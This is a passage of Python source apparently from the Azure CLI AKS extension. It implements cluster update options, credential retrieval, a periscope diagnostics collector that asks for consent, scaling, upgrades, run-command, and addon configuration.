not disable_local_accounts:
raise CLIError('Please specify "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--cluster-autoscaler-profile" or '
'"--enable-pod-security-policy" or '
'"--disable-pod-security-policy" or '
'"--api-server-authorized-ip-ranges" or '
'"--attach-acr" or '
'"--detach-acr" or '
'"--uptime-sla" or '
'"--no-uptime-sla" or '
'"--load-balancer-managed-outbound-ip-count" or '
'"--load-balancer-outbound-ips" or '
'"--load-balancer-outbound-ip-prefixes" or '
'"--enable-aad" or '
'"--aad-tenant-id" or '
'"--aad-admin-group-object-ids" or '
'"--enable-ahub" or '
'"--disable-ahub" or '
'"--enable-managed-identity" or '
'"--enable-pod-identity" or '
'"--disable-pod-identity" or '
'"--auto-upgrade-channel" or '
'"--enable-secret-rotation" or '
'"--disable-secret-rotation" or '
'"--tags" or '
'"--windows-admin-password" or '
'"--enable-azure-rbac" or '
'"--disable-azure-rbac" or '
'"--enable-local-accounts" or '
'"--disable-local-accounts"')
instance = client.get(resource_group_name, name)
if update_autoscaler and len(instance.agent_pool_profiles) > 1:
raise CLIError('There is more than one node pool in the cluster. Please use "az aks nodepool" command '
'to update per node pool auto scaler settings')
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count.')
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this managed cluster.\n'
'Please run "az aks update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
raise CLIError('Cluster autoscaler is not enabled for this managed cluster.\n'
'Run "az aks update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning(
'Cluster autoscaler is already disabled for this managed cluster.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
# if intention is to clear profile
if cluster_autoscaler_profile == {}:
instance.auto_scaler_profile = {}
# else profile is provided, update instance profile if it exists
elif cluster_autoscaler_profile:
instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__,
dict((key.replace("-", "_"), value)
for (key, value) in cluster_autoscaler_profile.items())) \
if instance.auto_scaler_profile else cluster_autoscaler_profile
if enable_pod_security_policy and disable_pod_security_policy:
raise CLIError('Cannot specify --enable-pod-security-policy and --disable-pod-security-policy '
'at the same time.')
if enable_pod_security_policy:
instance.enable_pod_security_policy = True
if disable_pod_security_policy:
instance.enable_pod_security_policy = False
if disable_local_accounts and enable_local_accounts:
raise CLIError('Cannot specify --disable-local-accounts and --enable-local-accounts '
'at the same time.')
if disable_local_accounts:
instance.disable_local_accounts = True
if enable_local_accounts:
instance.disable_local_accounts = False
if update_lb_profile:
instance.network_profile.load_balancer_profile = update_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout,
instance.network_profile.load_balancer_profile)
if attach_acr and detach_acr:
raise CLIError(
'Cannot specify "--attach-acr" and "--detach-acr" at the same time.')
if uptime_sla and no_uptime_sla:
raise CLIError(
'Cannot specify "--uptime-sla" and "--no-uptime-sla" at the same time.')
if uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
if no_uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Free"
)
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = ""
if _is_msi_cluster(instance):
if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
'Please do not set --attach-acr or --detach-acr. '
'You can manually grant or revoke permission to the identity named '
'<ClUSTER_NAME>-agentpool in MC_ resource group to access ACR.')
client_id = instance.identity_profile["kubeletidentity"].client_id
else:
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(
api_server_authorized_ip_ranges, instance)
if enable_aad:
if instance.aad_profile is not None and instance.aad_profile.managed:
raise CLIError(
'Cannot specify "--enable-aad" if managed AAD is already enabled')
instance.aad_profile = ManagedClusterAADProfile(
managed=True
)
if update_aad_profile:
if instance.aad_profile is None or not instance.aad_profile.managed:
raise CLIError('Cannot specify "--aad-tenant-id/--aad-admin-group-object-ids/--enable-azure-rbac/--disable-azure-rbac"'
' if managed AAD is not enabled')
if aad_tenant_id is not None:
instance.aad_profile.tenant_id = aad_tenant_id
if aad_admin_group_object_ids is not None:
instance.aad_profile.admin_group_object_ids = _parse_comma_separated_list(
aad_admin_group_object_ids)
if enable_azure_rbac and disable_azure_rbac:
raise CLIError(
'Cannot specify "--enable-azure-rbac" and "--disable-azure-rbac" at the same time')
if enable_azure_rbac:
instance.aad_profile.enable_azure_rbac = True
if disable_azure_rbac:
instance.aad_profile.enable_azure_rbac = False
if enable_ahub and disable_ahub:
raise CLIError(
'Cannot specify "--enable-ahub" and "--disable-ahub" at the same time')
if enable_ahub:
instance.windows_profile.license_type = 'Windows_Server'
if disable_ahub:
instance.windows_profile.license_type = 'None'
if instance.auto_upgrade_profile is None:
instance.auto_upgrade_profile = ManagedClusterAutoUpgradeProfile()
if auto_upgrade_channel is not None:
instance.auto_upgrade_profile.upgrade_channel = auto_upgrade_channel
if not enable_managed_identity and assign_identity:
raise CLIError(
'--assign-identity can only be specified when --enable-managed-identity is specified')
current_identity_type = "spn"
if instance.identity is not None:
current_identity_type = instance.identity.type.casefold()
goal_identity_type = current_identity_type
if enable_managed_identity:
if not assign_identity:
goal_identity_type = "systemassigned"
else:
goal_identity_type = "userassigned"
if current_identity_type != goal_identity_type:
from knack.prompting import prompt_y_n
msg = ""
if current_identity_type == "spn":
msg = ('Your cluster is using service principal, and you are going to update the cluster to use {} managed identity.\n'
'After updating, your cluster\'s control plane and addon pods will switch to use managed identity, but kubelet '
'will KEEP USING SERVICE PRINCIPAL until you upgrade your agentpool.\n '
'Are you sure you want to perform this operation?').format(goal_identity_type)
else:
msg = ('Your cluster is already using {} managed identity, and you are going to update the cluster to use {} managed identity. \n'
'Are you sure you want to perform this operation?').format(current_identity_type, goal_identity_type)
if not yes and not prompt_y_n(msg, default="n"):
return None
if goal_identity_type == "systemassigned":
instance.identity = ManagedClusterIdentity(
type="SystemAssigned"
)
elif goal_identity_type == "userassigned":
user_assigned_identity = {
assign_identity: ManagedClusterIdentityUserAssignedIdentitiesValue()
}
instance.identity = ManagedClusterIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identity
)
if enable_pod_identity:
if not _is_pod_identity_addon_enabled(instance):
# we only rebuild the pod identity profile if it's disabled before
_update_addon_pod_identity(
instance, enable=True,
allow_kubenet_consent=enable_pod_identity_with_kubenet,
)
if disable_pod_identity:
_update_addon_pod_identity(instance, enable=False)
azure_keyvault_secrets_provider_addon_profile = None
monitoring_addon_enabled = False
ingress_appgw_addon_enabled = False
virtual_node_addon_enabled = False
if instance.addon_profiles is not None:
azure_keyvault_secrets_provider_addon_profile = instance.addon_profiles.get(CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME, None)
azure_keyvault_secrets_provider_enabled = CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME].enabled
monitoring_addon_enabled = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
virtual_node_addon_enabled = CONST_VIRTUAL_NODE_ADDON_NAME + 'Linux' in instance.addon_profiles and \
instance.addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + 'Linux'].enabled
if enable_secret_rotation:
if not azure_keyvault_secrets_provider_enabled:
raise CLIError(
'--enable-secret-rotation can only be specified when azure-keyvault-secrets-provider is enabled')
azure_keyvault_secrets_provider_addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if disable_secret_rotation:
if not azure_keyvault_secrets_provider_enabled:
raise CLIError(
'--disable-secret-rotation can only be specified when azure-keyvault-secrets-provider is enabled')
azure_keyvault_secrets_provider_addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "false"
if tags:
instance.tags = tags
if windows_admin_password:
instance.windows_profile.admin_password = windows_admin_password
headers = get_aks_custom_headers(aks_custom_headers)
return _put_managed_cluster_ensuring_permission(cmd,
client,
subscription_id,
resource_group_name,
name,
instance,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
False,
instance.agent_pool_profiles[0].vnet_subnet_id,
_is_msi_cluster(instance),
attach_acr,
headers,
no_wait)
def aks_show(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def aks_get_credentials(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
admin=False,
user='clusterUser',
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
overwrite_existing=False,
context_name=None):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(
resource_group_name, name)
else:
if user.lower() == 'clusteruser':
credentialResults = client.list_cluster_user_credentials(
resource_group_name, name)
elif user.lower() == 'clustermonitoringuser':
credentialResults = client.list_cluster_monitoring_user_credentials(
resource_group_name, name)
else:
raise CLIError("The user is invalid.")
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(
encoding='UTF-8')
_print_or_merge_credentials(
path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
# pylint: disable=line-too-long
def aks_kollect(cmd, # pylint: disable=too-many-statements,too-many-locals
client,
resource_group_name,
name,
storage_account=None,
sas_token=None,
container_logs=None,
kube_objects=None,
node_logs=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
storage_account_id = None
if storage_account is None:
print("No storage account specified. Try getting storage account from diagnostic settings")
storage_account_id = get_storage_account_from_diag_settings(
cmd.cli_ctx, resource_group_name, name)
if storage_account_id is None:
raise CLIError(
"A storage account must be specified, since there isn't one in the diagnostic settings.")
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
if storage_account_id is None:
if not is_valid_resource_id(storage_account):
storage_account_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Storage', type='storageAccounts',
name=storage_account
)
else:
storage_account_id = storage_account
if is_valid_resource_id(storage_account_id):
try:
parsed_storage_account = parse_resource_id(storage_account_id)
except CloudError as ex:
raise CLIError(ex.message)
else:
raise CLIError("Invalid storage account id %s" % storage_account_id)
storage_account_name = parsed_storage_account['name']
readonly_sas_token = None
if sas_token is None:
storage_client = cf_storage(
cmd.cli_ctx, parsed_storage_account['subscription'])
storage_account_keys = storage_client.storage_accounts.list_keys(parsed_storage_account['resource_group'],
storage_account_name)
kwargs = {
'account_name': storage_account_name,
'account_key': storage_account_keys.keys[0].value
}
cloud_storage_client = cloud_storage_account_service_factory(
cmd.cli_ctx, kwargs)
sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rwdlacup',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rl',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = readonly_sas_token.strip('?')
from knack.prompting import prompt_y_n
print()
print('This will deploy a daemon set to your cluster to collect logs and diagnostic information and '
f'save them to the storage account '
f'{colorama.Style.BRIGHT}{colorama.Fore.GREEN}{storage_account_name}{colorama.Style.RESET_ALL} as '
f'outlined in {format_hyperlink("http://aka.ms/AKSPeriscope")}.')
print()
print('If you share access to that storage account to Azure support, you consent to the terms outlined'
f' in {format_hyperlink("http://aka.ms/DiagConsent")}.')
print()
if not prompt_y_n('Do you confirm?', default="n"):
return
print()
print("Getting credentials for cluster %s " % name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=True, path=temp_kubeconfig_path)
print()
print("Starts collecting diag info for cluster %s " % name)
sas_token = sas_token.strip('?')
deployment_yaml = urlopen(
"https://raw.githubusercontent.com/Azure/aks-periscope/latest/deployment/aks-periscope.yaml").read().decode()
deployment_yaml = deployment_yaml.replace("# <accountName, base64 encoded>",
(base64.b64encode(bytes(storage_account_name, 'ascii'))).decode('ascii'))
deployment_yaml = deployment_yaml.replace("# <saskey, base64 encoded>",
(base64.b64encode(bytes("?" + sas_token, 'ascii'))).decode('ascii'))
yaml_lines = deployment_yaml.splitlines()
for index, line in enumerate(yaml_lines):
if "DIAGNOSTIC_CONTAINERLOGS_LIST" in line and container_logs is not None:
yaml_lines[index] = line + ' ' + container_logs
if "DIAGNOSTIC_KUBEOBJECTS_LIST" in line and kube_objects is not None:
yaml_lines[index] = line + ' ' + kube_objects
if "DIAGNOSTIC_NODELOGS_LIST" in line and node_logs is not None:
yaml_lines[index] = line + ' ' + node_logs
deployment_yaml = '\n'.join(yaml_lines)
fd, temp_yaml_path = tempfile.mkstemp()
temp_yaml_file = os.fdopen(fd, 'w+t')
try:
temp_yaml_file.write(deployment_yaml)
temp_yaml_file.flush()
temp_yaml_file.close()
try:
print()
print("Cleaning up aks-periscope resources if existing")
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"serviceaccount,configmap,daemonset,secret",
"--all", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding-view", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRole",
"aks-periscope-role", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"--all",
"apd", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.DEVNULL)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"CustomResourceDefinition",
"diagnostics.aks-periscope.azure.github.com", "--ignore-not-found"],
stderr=subprocess.STDOUT)
print()
print("Deploying aks-periscope")
subprocess.check_output(["kubectl", "--kubeconfig", temp_kubeconfig_path, "apply", "-f",
temp_yaml_path, "-n", "aks-periscope"], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
finally:
os.remove(temp_yaml_path)
print()
fqdn = mc.fqdn if mc.fqdn is not None else mc.private_fqdn
normalized_fqdn = fqdn.replace('.', '-')
token_in_storage_account_url = readonly_sas_token if readonly_sas_token is not None else sas_token
log_storage_account_url = f"https://{storage_account_name}.blob.core.windows.net/" \
f"{_trim_fqdn_name_containing_hcp(normalized_fqdn)}?{token_in_storage_account_url}"
print(f'{colorama.Fore.GREEN}Your logs are being uploaded to storage account {format_bright(storage_account_name)}')
print()
print(f'You can download Azure Stroage Explorer here '
f'{format_hyperlink("https://azure.microsoft.com/en-us/features/storage-explorer/")}'
f' to check the logs by adding the storage account using the following URL:')
print(f'{format_hyperlink(log_storage_account_url)}')
print()
if not prompt_y_n('Do you want to see analysis results now?', default="n"):
print(f"You can run 'az aks kanalyze -g {resource_group_name} -n {name}' "
f"anytime to check the analysis results.")
else:
display_diagnostics_report(temp_kubeconfig_path)
def aks_kanalyze(cmd, client, resource_group_name, name):
colorama.init()
client.get(resource_group_name, name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=True, path=temp_kubeconfig_path)
display_diagnostics_report(temp_kubeconfig_path)
def aks_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
node_count,
nodepool_name="",
no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There are more than one node pool in the cluster. '
'Please specify nodepool name or use az aks nodepool command to scale node pool')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError(
"Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_upgrade(cmd, # pylint: disable=unused-argument, too-many-return-statements
client,
resource_group_name,
name,
kubernetes_version='',
control_plane_only=False,
no_wait=False,
node_image_only=False,
aks_custom_headers=None,
yes=False):
from knack.prompting import prompt_y_n
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
msg = "This node image upgrade operation will run across every node pool in the cluster" \
"and might take a while, do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
# This only provide convenience for customer at client side so they can run az aks upgrade to upgrade all
# nodepools of a cluster. The SDK only support upgrade single nodepool at a time.
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation '
'can only be applied on VirtualMachineScaleSets cluster.')
agent_pool_client = cf_agent_pools(cmd.cli_ctx)
_upgrade_single_nodepool_image_version(
True, agent_pool_client, resource_group_name, name, agent_pool_profile.name)
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance, custom_headers=headers)
def aks_runcommand(cmd, client, resource_group_name, name, command_string="", command_files=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not command_string:
raise CLIError('Command cannot be empty.')
request_payload = RunCommandRequest(command=command_string)
request_payload.context = _get_command_context(command_files)
if mc.aad_profile is not None and mc.aad_profile.managed:
request_payload.cluster_token = _get_dataplane_aad_token(
cmd.cli_ctx, "6dae42f8-4368-4678-94ff-3960e28e3630")
commandResultFuture = client.run_command(
resource_group_name, name, request_payload, long_running_operation_timeout=5, retry_total=0)
return _print_command_result(cmd.cli_ctx, commandResultFuture.result(300))
def aks_command_result(cmd, client, resource_group_name, name, command_id=""):
if not command_id:
raise CLIError('CommandID cannot be empty.')
commandResult = client.get_command_result(
resource_group_name, name, command_id)
return _print_command_result(cmd.cli_ctx, commandResult)
def _print_command_result(cli_ctx, commandResult):
# cli_ctx.data['safe_params'] contains list of parameter name user typed in, without value.
# cli core also use this calculate ParameterSetName header for all http request from cli.
if cli_ctx.data['safe_params'] is None or "-o" in cli_ctx.data['safe_params'] or "--output" in cli_ctx.data['safe_params']:
# user specified output format, honor their choice, return object to render pipeline
return commandResult
else:
# user didn't specified any format, we can customize the print for best experience
if commandResult.provisioning_state == "Succeeded":
# succeed, print exitcode, and logs
print(f"{colorama.Fore.GREEN}command started at {commandResult.started_at}, finished at {commandResult.finished_at}, with exitcode={commandResult.exit_code}{colorama.Style.RESET_ALL}")
print(commandResult.logs)
return
if commandResult.provisioning_state == "Failed":
# failed, print reason in error
print(
f"{colorama.Fore.RED}command failed with reason: {commandResult.reason}{colorama.Style.RESET_ALL}")
return
# *-ing state
print(f"{colorama.Fore.BLUE}command is in : {commandResult.provisioning_state} state{colorama.Style.RESET_ALL}")
return None
def _get_command_context(command_files):
if not command_files:
return ""
filesToAttach = {}
# . means to attach current folder, cannot combine more files. (at least for now)
if len(command_files) == 1 and command_files[0] == ".":
# current folder
cwd = os.getcwd()
for filefolder, _, files in os.walk(cwd):
for file in files:
# retain folder structure
rel = os.path.relpath(filefolder, cwd)
filesToAttach[os.path.join(
filefolder, file)] = os.path.join(rel, file)
else:
for file in command_files:
if file == ".":
raise CLIError(
". is used to attach current folder, not expecting other attachements.")
if os.path.isfile(file):
# for individual attached file, flatten them to same folder
filesToAttach[file] = os.path.basename(file)
else:
raise CLIError(f"{file} is not valid file, or not accessable.")
if len(filesToAttach) < 1:
logger.debug("no files to attach!")
return ""
zipStream = io.BytesIO()
zipFile = zipfile.ZipFile(zipStream, "w")
for _, (osfile, zipEntry) in enumerate(filesToAttach.items()):
zipFile.write(osfile, zipEntry)
# zipFile.printdir() // use this to debug
zipFile.close()
return str(base64.encodebytes(zipStream.getbuffer()), "utf-8")
def _get_dataplane_aad_token(cli_ctx, serverAppId):
# this function is mostly copied from keyvault cli
import adal
try:
return Profile(cli_ctx=cli_ctx).get_raw_token(resource=serverAppId)[0][2].get('accessToken')
except adal.AdalError as err:
# pylint: disable=no-member
if (hasattr(err, 'error_response') and
('error_description' in err.error_response) and
('AADSTS70008:' in err.error_response['error_description'])):
raise CLIError(
"Credentials have expired due to inactivity. Please run 'az login'")
raise CLIError(err)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name):
return sdk_no_wait(no_wait, client.upgrade_node_image_version, resource_group_name, cluster_name, nodepool_name)
def _handle_addons_args(cmd, # pylint: disable=too-many-statements
addons_str,
subscription_id,
resource_group_name,
addon_profiles=None,
workspace_resource_id=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
aci_subnet_name=None,
vnet_subnet_id=None,
enable_secret_rotation=False):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons or 'azure-defender' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = _sanitize_loganalytics_ws_resource_id(workspace_resource_id)
if 'monitoring' in addons:
addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True, config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id})
addons.remove('monitoring')
if 'azure-defender' in addons:
addon_profiles[CONST_AZURE_DEFENDER_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True, config={CONST_AZURE_DEFENDER_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id})
addons.remove('azure-defender')
# error out if '--enable-addons=monitoring/azure-defender' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError(
'"--workspace-resource-id" requires "--enable-addons [monitoring/azure-defender]".')
if 'azure-policy' in addons:
addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('azure-policy')
if 'gitops' in addons:
addon_profiles['gitops'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('gitops')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
if 'open-service-mesh' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
addon_profiles[CONST_OPEN_SERVICE_MESH_ADDON_NAME] = addon_profile
addons.remove('open-service-mesh')
if 'azure-keyvault-secrets-provider' in addons:
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addons.remove('azure-keyvault-secrets-provider')
if 'confcom' in addons:
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
addons.remove('confcom')
if 'virtual-node' in addons:
if not aci_subnet_name or not vnet_subnet_id:
raise CLIError(
'"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
# TODO: how about aciConnectorwindows, what is its addon name?
os_type = 'Linux'
addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
enabled=True,
config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
)
addons.remove('virtual-node')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
